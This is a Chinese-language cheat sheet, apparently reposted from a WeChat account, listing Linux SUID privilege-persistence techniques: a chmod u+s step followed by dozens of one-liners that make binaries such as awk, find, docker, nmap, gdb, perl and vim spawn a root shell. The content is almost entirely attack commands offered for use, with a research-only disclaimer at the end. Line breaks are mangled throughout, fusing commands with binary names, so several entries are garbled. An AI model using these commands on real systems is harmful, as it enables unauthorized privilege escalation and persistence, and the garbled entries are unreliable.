赋权姿势:
chmod u+s programe
time
/usr/bin/time /bin/bash -c whoamiawk
awk 'BEGIN {system("/bin/bash -c whoami")}'bash/sh
略bushbox
busybox sh -c whoamicapsh
capsh -- -c whoamicpio
echo '/bin/sh </dev/tty >/dev/tty' >localhostcpio -o --rsh-command /bin/sh -F localhost:
cpulimit
cpulimit -l 100 -f /bin/bash -c whoamicsh
csh -c whoamidash
dash -c whoamdocker
docker run -v /:/mnt --rm -it alpine chroot /mnt shed
ed!/bin/sh
emacs
emacs -Q -nw --eval '(term "/bin/sh")'env
env /bin/shexpect
expect -c 'spawn /bin/sh;interact'find
find . -exec /bin/sh whoami;flock
flock -u / /bin/shgawk
gawk 'BEGIN {system("/bin/sh")}'gdb
gdb -nx -ex '!sh' -ex quitgtester
gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.system("sh")'ionice
ionice /bin/shjjs
echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c $@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)').waitFor()" | jjshping3
hping3/bin/sh
jrunscript
jrunscript -e "exec('/bin/sh -c $@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)')"ksh
kshld.so
/lib/ld.so /bin/shless
less /etc/profile!/bin/sh
logsave
logsave /dev/null /bin/sh -ilua
lua -e 'os.execute("/bin/sh")'make
COMMAND='/bin/sh'make -s --eval=$'x:nt-'"$COMMAND"
more
TERM= more /etc/profile!/bin/sh
msgfilter
echo x | msgfilter -P /bin/sh -c '/bin/sh 0<&2 1>&2; kill $PPID'mawk
mawk 'BEGIN {system("/bin/sh")}'nawk
nawk 'BEGIN {system("/bin/sh")}'nice
nice /bin/shnmap
TF=$(mktemp)echo 'os.execute("/bin/sh")' > $TFnmap --script=$TFnmap --interactivenmap> !sh
node
node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'nohup
nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"openvpn
openvpn --dev null --script-security 2 --up '/bin/sh -c sh'perl
perl -e 'exec "/bin/sh";'pg
pg /etc/profile!/bin/sh
php
export CMD="/bin/sh"php -r 'system(getenv("CMD"));'
python(已失效)
python -c 'import os; os.system("/bin/sh")'rlwrap
rlwrap /bin/shrsync
rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/nullrun-parts
run-parts --new-session --regex '^sh$' /binrview(已失效)
rview -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'sqlite3
sqlite3 /dev/null '.shell /bin/sh'start-stop-daemon
start-stop-daemon -n $RANDOM -S -x /bin/shstdbuf
stdbuf -i0 /bin/shstrace
strace -o /dev/null /bin/shtaskset
taskset 1 /bin/shtclsh
tclshexec /bin/sh <@stdin >@stdout 2>@stderr
timeout
timeout 7d /bin/shunshare
unshare /bin/shvimdiff
vimdiff -c ':!/bin/sh'watch
watch -x sh -c 'reset; exec sh 1>&0 2>&0'xargs
xargs -a /dev/null shzsh
zsh写在最后:发现很多都失效了,但是部分有绕过的姿势
。:.゚ヽ(。◕‿◕。)ノ゚.:。+゚防盗专用。:.゚ヽ(。◕‿◕。)ノ゚.:。+゚
^_^文章来源:微信公众号(边界骇客) ^_^
本文始发于微信公众号(边界骇客):linux suid权限维持速查表
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论